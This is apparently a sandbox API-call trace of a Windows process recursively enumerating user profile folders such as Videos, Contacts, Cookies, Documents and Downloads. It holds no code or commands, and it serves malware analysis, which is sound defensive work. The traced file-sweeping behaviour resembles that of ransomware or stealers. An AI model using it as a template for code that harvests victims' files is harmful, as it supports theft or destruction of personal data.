lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x5b84a0, ftCreationTime.dwLowDateTime=0x5bace8, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0068.393] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dd410 | out: hHeap=0x580000) returned 1 [0068.393] FindNextFileW (in: hFindFile=0x5a4020, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9080e80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9080e80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Videos", cAlternateFileName="")) returned 1 [0068.393] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.393] lstrlenW (lpString="Videos") returned 6 [0068.393] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9080e80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9080e80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5c8c48 [0068.393] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9080e80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9080e80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.393] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.393] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e74990, ftCreationTime.dwHighDateTime=0x1d5e302, ftLastAccessTime.dwLowDateTime=0xc1fa280, ftLastAccessTime.dwHighDateTime=0x1d5e464, ftLastWriteTime.dwLowDateTime=0xc1fa280, ftLastWriteTime.dwHighDateTime=0x1d5e464, nFileSizeHigh=0x0, nFileSizeLow=0x18450, dwReserved0=0x0, dwReserved1=0x0, cFileName="2tPFW99ag-yxfOFr.mp4", cAlternateFileName="2TPFW9~1.MP4")) returned 1 [0068.393] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.393] lstrlenW (lpString="2tPFW99ag-yxfOFr.mp4") returned 20 [0068.394] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\*", lpFindFileData=0x5dd878 | out: lpFindFileData=0x5dd878*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x70ea66f0, ftCreationTime.dwHighDateTime=0x1d5e40f, ftLastAccessTime.dwLowDateTime=0xb1272f40, ftLastAccessTime.dwHighDateTime=0x1d5e131, ftLastWriteTime.dwLowDateTime=0xb1272f40, ftLastWriteTime.dwHighDateTime=0x1d5e131, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5c8c88 [0068.394] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5dd878 | out: lpFindFileData=0x5dd878*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x70ea66f0, ftCreationTime.dwHighDateTime=0x1d5e40f, ftLastAccessTime.dwLowDateTime=0xb1272f40, ftLastAccessTime.dwHighDateTime=0x1d5e131, ftLastWriteTime.dwLowDateTime=0xb1272f40, ftLastWriteTime.dwHighDateTime=0x1d5e131, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.394] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.394] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5dd878 | out: lpFindFileData=0x5dd878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73f50d30, ftCreationTime.dwHighDateTime=0x1d5e2c2, ftLastAccessTime.dwLowDateTime=0xbc924270, ftLastAccessTime.dwHighDateTime=0x1d5dbf5, ftLastWriteTime.dwLowDateTime=0xbc924270, ftLastWriteTime.dwHighDateTime=0x1d5dbf5, nFileSizeHigh=0x0, nFileSizeLow=0x17e66, dwReserved0=0x0, dwReserved1=0x0, cFileName="6qaQ.flv", cAlternateFileName="")) returned 1 [0068.394] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.394] lstrlenW (lpString="6qaQ.flv") returned 8 [0068.394] FindClose (in: hFindFile=0x5c8c88 | out: hFindFile=0x5c8c88) returned 1 [0068.395] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dd878 | out: hHeap=0x580000) returned 1 [0068.395] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab5d3a50, ftCreationTime.dwHighDateTime=0x1d5de3e, ftLastAccessTime.dwLowDateTime=0x7acd89e0, ftLastAccessTime.dwHighDateTime=0x1d5e68f, ftLastWriteTime.dwLowDateTime=0x7acd89e0, ftLastWriteTime.dwHighDateTime=0x1d5e68f, nFileSizeHigh=0x0, nFileSizeLow=0x16fc2, dwReserved0=0x0, dwReserved1=0x0, cFileName="vyR- y.mp4", cAlternateFileName="VYR-Y~1.MP4")) returned 1 [0068.395] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.395] lstrlenW (lpString="vyR- y.mp4") returned 10 [0068.395] FindClose (in: hFindFile=0x5c8c48 | out: hFindFile=0x5c8c48) returned 1 [0068.395] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dd410 | out: hHeap=0x580000) returned 1 [0068.395] FindNextFileW (in: hFindFile=0x5a4020, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9080e80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9080e80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Videos", cAlternateFileName="")) returned 0 [0068.395] FindClose (in: hFindFile=0x5a4020 | out: hFindFile=0x5a4020) returned 1 [0068.395] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ba860 | out: hHeap=0x580000) returned 1 [0068.395] FindNextFileW (in: hFindFile=0x5c04d8, lpFindFileData=0x5a5260 | out: lpFindFileData=0x5a5260*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0xfb5199ba, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0068.395] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.395] lstrlenW (lpString="All Users") returned 9 [0068.395] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\*", lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName=".", cAlternateFileName="")) returned 0x5c8c48 [0068.395] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="..", cAlternateFileName="")) returned 1 [0068.395] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.396] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="AppData", cAlternateFileName="")) returned 1 [0068.396] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.396] lstrlenW (lpString="AppData") returned 7 [0068.396] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Application Data\\*", lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x5db068, ftCreationTime.dwLowDateTime=0x5dd9f8, ftCreationTime.dwHighDateTime=0x1d5dbfa, ftLastAccessTime.dwLowDateTime=0xa77dc3b0, ftLastAccessTime.dwHighDateTime=0x1d5dc71, ftLastWriteTime.dwLowDateTime=0xa77dc3b0, ftLastWriteTime.dwHighDateTime=0x1d5dc71, nFileSizeHigh=0x0, nFileSizeLow=0x10964, dwReserved0=0x0, dwReserved1=0x0, cFileName="XAXO.flv", cAlternateFileName="")) returned 0xffffffff [0068.396] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dd410 | out: hHeap=0x580000) returned 1 [0068.396] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Contacts", cAlternateFileName="")) returned 1 [0068.396] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.396] lstrlenW (lpString="Contacts") returned 8 [0068.396] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\*", lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5c8c88 [0068.397] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.397] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.397] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0068.397] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.397] lstrlenW (lpString="Administrator.contact") returned 21 [0068.397] FindClose (in: hFindFile=0x5c8c88 | out: hFindFile=0x5c8c88) returned 1 [0068.397] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dd410 | out: hHeap=0x580000) returned 1 [0068.397] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Cookies", cAlternateFileName="")) returned 1 [0068.397] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.397] lstrlenW (lpString="Cookies") returned 7 [0068.397] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Cookies\\*", lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x5db068, ftCreationTime.dwLowDateTime=0x5bace8, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0xffffffff [0068.397] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dd410 | out: hHeap=0x580000) returned 1 [0068.397] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Desktop", cAlternateFileName="")) returned 1 [0068.397] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.397] lstrlenW (lpString="Desktop") returned 7 [0068.397] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\*", lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5c8c88 [0068.398] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.398] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.398] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0068.398] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.398] lstrlenW (lpString="desktop.ini") returned 11 [0068.398] FindClose (in: hFindFile=0x5c8c88 | out: hFindFile=0x5c8c88) returned 1 [0068.398] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dd410 | out: hHeap=0x580000) returned 1 [0068.398] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0068.398] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.398] lstrlenW (lpString="Documents") returned 9 [0068.398] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\*", lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5c8c88 [0068.399] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.399] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.399] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0068.399] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.399] lstrlenW (lpString="desktop.ini") returned 11 [0068.399] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Music\\*", lpFindFileData=0x5dc070 | out: lpFindFileData=0x5dc070*(dwFileAttributes=0x5d6f68, ftCreationTime.dwLowDateTime=0x5bace8, ftCreationTime.dwHighDateTime=0xdd1384a0, ftLastAccessTime.dwLowDateTime=0x1d5e82a, ftLastAccessTime.dwHighDateTime=0x1002a, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x11000, nFileSizeHigh=0x0, nFileSizeLow=0x20, dwReserved0=0x30, dwReserved1=0x0, cFileName="\x187VLVCE~1.JPG7vlVcej5PfP0JrtmTZQq.jpg", cAlternateFileName="")) returned 0xffffffff [0068.400] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dc070 | out: hHeap=0x580000) returned 1 [0068.400] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0068.400] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.400] lstrlenW (lpString="My Pictures") returned 11 [0068.400] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures\\*", lpFindFileData=0x5dc070 | out: lpFindFileData=0x5dc070*(dwFileAttributes=0x5d6f68, ftCreationTime.dwLowDateTime=0x5bace8, ftCreationTime.dwHighDateTime=0xdd1384a0, ftLastAccessTime.dwLowDateTime=0x1d5e82a, ftLastAccessTime.dwHighDateTime=0x1002a, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x11000, nFileSizeHigh=0x0, nFileSizeLow=0x20, dwReserved0=0x30, dwReserved1=0x0, cFileName="\x187VLVCE~1.JPG7vlVcej5PfP0JrtmTZQq.jpg", cAlternateFileName="")) returned 0xffffffff [0068.400] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dc070 | out: hHeap=0x580000) returned 1 [0068.400] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0068.400] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.400] lstrlenW (lpString="My Videos") returned 9 [0068.400] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Videos\\*", lpFindFileData=0x5dc070 | out: lpFindFileData=0x5dc070*(dwFileAttributes=0x5d6f68, ftCreationTime.dwLowDateTime=0x5bace8, ftCreationTime.dwHighDateTime=0xdd1384a0, ftLastAccessTime.dwLowDateTime=0x1d5e82a, ftLastAccessTime.dwHighDateTime=0x1002a, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x11000, nFileSizeHigh=0x0, nFileSizeLow=0x20, dwReserved0=0x30, dwReserved1=0x0, cFileName="\x187VLVCE~1.JPG7vlVcej5PfP0JrtmTZQq.jpg", cAlternateFileName="")) returned 0xffffffff [0068.400] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dc070 | out: hHeap=0x580000) returned 1 [0068.400] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0068.400] FindClose (in: hFindFile=0x5c8c88 | out: hFindFile=0x5c8c88) returned 1 [0068.401] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dd410 | out: hHeap=0x580000) returned 1 [0068.401] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0068.401] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.401] lstrlenW (lpString="Downloads") returned 9 [0068.401] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\*", lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5c8c88 [0068.401] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5dd410 | out: lpFindFileData=0x5dd410*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, 